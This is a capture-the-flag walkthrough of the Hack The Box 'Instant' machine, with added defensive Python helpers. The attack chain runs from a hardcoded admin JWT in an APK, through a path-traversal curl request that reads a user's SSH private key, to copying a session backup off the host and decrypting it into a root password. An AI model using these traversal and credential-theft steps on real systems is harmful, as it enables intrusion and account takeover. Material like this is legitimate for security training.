Instant – Hack The Box – @lautarovculic

Instant

User.txt

Let’s discover open ports with nmap

    sudo nmap -p- -Pn -T4 --min-rate 5000 -sSCV 10.10.11.37

Output:

    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
    |_  256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
    80/tcp open  http    Apache httpd 2.4.58
    |_http-title: Instant Wallet
    |_http-server-header: Apache/2.4.58 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add the hostname to our /etc/hosts file

    echo "10.10.11.37 instant.htb" | sudo tee -a /etc/hosts

On the website we can see that there is an APK file available.
Download it with

    wget http://instant.htb/downloads/instant.apk

Decompile this with apktool

    apktool d instant.apk

And let’s inspect the source code with jadx (GUI version)

In the AdminActivities class we can see a hardcoded JWT:

    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA
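To see what that token actually grants without sending it anywhere, here is an added Python helper (not part of the original writeup or of the Instant app) that base64url-decodes the header and payload and lists the properties a reviewer would flag: algorithm, role claim and how far away the expiry is. It does not verify the signature; the point is triage of a credential that shipped inside a client binary. The token constant is the one from the APK above; the function names and the findings wording are my own.

```python
import base64
import json
from datetime import datetime, timezone
from typing import Optional

# Token hardcoded in the APK's AdminActivities class (copied from the writeup above).
APK_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ."
    "v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
)


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop the base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_jwt(token: str, now: Optional[float] = None) -> dict:
    """Decode a compact JWS *without verifying it* and flag risky properties.

    Returns the header, the payload, the remaining lifetime in days (None when
    there is no exp claim) and a list of human-readable findings.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS: expected 3 dot-separated segments")
    header = json.loads(_b64url_decode(parts[0]))
    payload = json.loads(_b64url_decode(parts[1]))
    if now is None:
        now = datetime.now(timezone.utc).timestamp()

    findings = []
    days_left = None
    exp = payload.get("exp")
    if exp is None:
        findings.append("no exp claim: the token never expires")
    else:
        days_left = (exp - now) / 86400
        if days_left > 365:
            findings.append(
                f"exp is {days_left:.0f} days away: effectively a permanent credential"
            )
    alg = str(header.get("alg", ""))
    if alg == "HS256":
        findings.append("HS256: whoever holds the server's secret can mint any token")
    elif alg.lower() == "none":
        findings.append("alg=none: the token is unsigned")
    if str(payload.get("role", "")).lower() == "admin":
        findings.append("role=Admin: the token grants administrative access")

    return {
        "header": header,
        "payload": payload,
        "days_until_expiry": days_left,
        "findings": findings,
    }


if __name__ == "__main__":
    report = inspect_jwt(APK_TOKEN)
    print("header :", report["header"])
    print("payload:", report["payload"])
    for finding in report["findings"]:
        print(" -", finding)
```

Run it with the token from the APK and it reports an HS256 token with role Admin whose exp lies roughly a thousand years out, which is the combination that lets the rest of this writeup work. Shipping such a token inside a client is the finding; rotating the server secret invalidates it.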

We can also find some API hostnames in the app's network security config, the file where an Android app declares per-domain trust and cleartext settings.

    tree ./instant/res/xml

    ./instant/res/xml
    └── network_security_config.xml

Content:

    <?xml version="1.0" encoding="utf-8"?>
    <network-security-config>
        <domain-config cleartextTrafficPermitted="true">
            <domain includeSubdomains="true">mywalletv1.instant.htb</domain>
            <domain includeSubdomains="true">swagger-ui.instant.htb</domain>
        </domain-config>
    </network-security-config>
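What that file means in practice: the app is allowed to talk to both API hosts over plain HTTP, so anything it sends, the admin token included, can travel unencrypted. The following added Python snippet (mine, not from the writeup or the app) parses a network_security_config.xml and reports which domains permit cleartext traffic and which trust user-installed CAs, handling the inheritance rule for nested domain-config blocks. The XML string is the one extracted above; the function names are my own.

```python
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# network_security_config.xml extracted from the APK (copied from the writeup above).
NSC_XML = """<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">mywalletv1.instant.htb</domain>
        <domain includeSubdomains="true">swagger-ui.instant.htb</domain>
    </domain-config>
</network-security-config>"""


def _bool_attr(elem: ET.Element, name: str) -> Optional[bool]:
    """True/False for an XML boolean attribute, None when it is absent."""
    value = elem.get(name)
    return None if value is None else value.strip().lower() == "true"


def _trusts_user_cas(cfg: ET.Element) -> bool:
    # Only this element's own <trust-anchors>, not those of nested <domain-config>s.
    return any(c.get("src") == "user" for c in cfg.findall("trust-anchors/certificates"))


def audit_network_security_config(xml_text: str) -> dict:
    """Report cleartext-permitted domains and user-CA-trusting domains."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    if root.tag != "network-security-config":
        raise ValueError("root element is not <network-security-config>")

    base = root.find("base-config")
    base_cleartext = _bool_attr(base, "cleartextTrafficPermitted") if base is not None else None
    cleartext_domains: List[Tuple[str, bool]] = []
    user_ca_domains: List[str] = []

    def walk(cfg: ET.Element, inherited_cleartext: bool) -> None:
        # A <domain-config> without the attribute inherits the parent's setting.
        cleartext = _bool_attr(cfg, "cleartextTrafficPermitted")
        if cleartext is None:
            cleartext = inherited_cleartext
        user_cas = _trusts_user_cas(cfg)
        for dom in cfg.findall("domain"):
            name = (dom.text or "").strip()
            include_sub = bool(_bool_attr(dom, "includeSubdomains"))
            if cleartext:
                cleartext_domains.append((name, include_sub))
            if user_cas:
                user_ca_domains.append(name)
        for child in cfg.findall("domain-config"):
            walk(child, cleartext)

    # Apps targeting API 28+ default to no cleartext; assume that when base-config is unset.
    for cfg in root.findall("domain-config"):
        walk(cfg, bool(base_cleartext))

    return {
        "base_cleartext": base_cleartext,
        "cleartext_domains": cleartext_domains,
        "user_ca_domains": user_ca_domains,
    }


if __name__ == "__main__":
    report = audit_network_security_config(NSC_XML)
    print("base-config cleartext:", report["base_cleartext"])
    for name, include_sub in report["cleartext_domains"]:
        print(f"cleartext permitted: {name}{' (+subdomains)' if include_sub else ''}")
    for name in report["user_ca_domains"]:
        print("trusts user CAs:", name)
```

On this config it reports both API hosts (and their subdomains) as cleartext-permitted and no user-CA trust. The fix on the app side is to drop cleartextTrafficPermitted and serve the API over TLS only.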

Add these hosts to our /etc/hosts file as well

    echo "10.10.11.37 mywalletv1.instant.htb" | sudo tee -a /etc/hosts

And

    echo "10.10.11.37 swagger-ui.instant.htb" | sudo tee -a /etc/hosts

Let's go to swagger-ui.instant.htb.
After analyzing the UI, we can see that we can probably get an LFI.
Click the Authorize button and paste the Authorization key that we found in the Android application.

The log-reading endpoint takes a file name, so we can request ../.ssh/id_rsa.
Here's the curl command:

    curl --header "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA" 'http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=../.ssh/id_rsa'
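For contrast, here is how the log-reading endpoint should have constrained log_file_name. This is an added Python example, not the code of the Instant API: unsafe_log_path mirrors the naive join that makes the traversal above work, and safe_log_path is the hardened version that only accepts a bare file name and additionally resolves the final path and refuses anything outside the log directory. The LOG_PATH value is the one from the .env shown later in this writeup; the function names are my own.

```python
import os

# LOG_PATH as set in the API's .env (value shown later in the writeup).
LOG_PATH = "/home/shirohige/logs/"


def unsafe_log_path(log_dir: str, log_file_name: str) -> str:
    """The naive version: join whatever the client sent onto the log directory.

    Nothing stops '../' from walking out of log_dir, which is exactly what the
    request above relies on.
    """
    return os.path.normpath(os.path.join(log_dir, log_file_name))


def safe_log_path(log_dir: str, log_file_name: str) -> str:
    """Hardened version: a log file name is a plain file name inside log_dir.

    Two independent checks:
      1. reject anything that is not a plain file name (empty, '.', '..',
         NUL bytes, path separators);
      2. resolve the final path with realpath(), which collapses '..' and
         follows symlinks, and require it to stay under the resolved log dir.
    Check 2 is the one that still holds if someone later relaxes check 1.
    """
    if not log_file_name or log_file_name in (".", "..") or "\x00" in log_file_name:
        raise ValueError("empty or invalid log file name")
    if os.sep in log_file_name or (os.altsep and os.altsep in log_file_name):
        raise ValueError("log file name must not contain path separators")
    base = os.path.realpath(log_dir)
    candidate = os.path.realpath(os.path.join(base, log_file_name))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"resolved path escapes {base}")
    return candidate


def is_safe_log_name(log_dir: str, log_file_name: str) -> bool:
    """Convenience wrapper: True if safe_log_path would accept the name."""
    try:
        safe_log_path(log_dir, log_file_name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in ("app.log", "../.ssh/id_rsa", "/etc/passwd"):
        print(f"{name!r:22} naive -> {unsafe_log_path(LOG_PATH, name)}")
        print(f"{'':22} safe  -> {'accepted' if is_safe_log_name(LOG_PATH, name) else 'rejected'}")
```

The naive join turns ../.ssh/id_rsa into /home/shirohige/.ssh/id_rsa, while the hardened function rejects it before any file is opened. Running the API as a dedicated low-privilege account rather than as the user whose SSH key sits one directory up would have limited the impact even with the bug present.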

Here's the id_rsa

    -----BEGIN RSA PRIVATE KEY-----
    [key body omitted]
    -----END RSA PRIVATE KEY-----

In the API UI we can list the users. We can see that if we register as a new user, our id is 3.
So the user for logging in via SSH is probably shirohige.

Then

    chmod 600 id_rsa

    ssh -i id_rsa shirohige@10.10.11.37

And we can find the user.txt flag

    shirohige@instant:~$ cat user.txt
    d846f3d**********d378bb
    shirohige@instant:~$

Root.txt

We can guess that the escalation is via Solar-PuTTY.
I found this directory, /opt/backups/Solar-PuTTY, and this file, sessions-backup.dat.

So, we can try to decrypt the session file.
Transfer the file to our machine: on the target, serve its directory with

    python3 -m http.server 8000

Then, on our machine

    wget http://10.10.11.37:8000/sessions-backup.dat

I'll use this executable
https://github.com/VoidSec/SolarPuttyDecrypt/releases/tag/v1.0
Download the zip and the code file.

IMPORTANT
You need to make some changes in the project to avoid errors with the file path.

In my case I used a Windows 10 VM in VirtualBox for this process.
Transfer the .dat file and the tool to the Windows machine.

Here's the secret key, found in the .env of the API project:

    shirohige@instant:~/projects/mywallet/Instant-Api/mywallet$ ls -la

    total 76
    drwxr-xr-x 5 shirohige shirohige  4096 Oct  4 15:22 .
    drwxr-xr-x 4 shirohige shirohige  4096 Oct  4 15:22 ..
    -rw-r--r-- 1 shirohige shirohige    71 Aug  8 19:34 .env
    drwxrwxr-x 2 shirohige shirohige  4096 Oct  4 15:22 __pycache__
    -rw-r--r-- 1 shirohige shirohige 13255 Oct  2 11:02 app.py
    drwxr-xr-x 2 shirohige shirohige  4096 Oct 12 20:10 instance
    -rw-r--r-- 1 shirohige shirohige  2231 Jul 21 22:13 models.py
    -rw-r--r-- 1 shirohige shirohige   584 Aug  2 15:43 requirements.txt
    -rw-r--r-- 1 shirohige shirohige 25488 Oct  4 10:50 serve.py
    drwxr-xr-x 2 shirohige shirohige  4096 Oct  4 15:22 swagger_configs
    shirohige@instant:~/projects/mywallet/Instant-Api/mywallet$ cat .env
    SECRET_KEY=VeryStrongS3cretKeyY0uC4NTGET
    LOG_PATH=/home/shirohige/logs/

The key is VeryStrongS3cretKeyY0uC4NTGET, so we can run on our Windows machine

    SolarPuttyDecrypt.exe sessions-backup.dat VeryStrongS3cretKeyY0uC4NTGET

Output:

    -----------------------------------------------------
    SolarPutty's Sessions Decrypter by VoidSec
    -----------------------------------------------------
    {
      "Credentials": [
        {
          "Id": "452ed919-530e-419b-b721-da76cbe8ed04",
          "CredentialsName": "instant-root",
          "Username": "root",
          "Password": "12**24nzC!r0c%q12",
          "PrivateKeyPath": "",
          "Passphrase": "",
          "PrivateKeyContent": null
        }
      ]
    }

Then, with the su command, log in with the password 12**24nzC!r0c%q12

    shirohige@instant:~/projects/mywallet/Instant-Api/mywallet$ su
    Password:
    root@instant:/home/shirohige/projects/mywallet/Instant-Api/mywallet# cat /root/root.txt
    ac8b41****************32e09
    root@instant:/home/shirohige/projects/mywallet/Instant-Api/mywallet#

And we get the flag.

I hope you found it useful (:
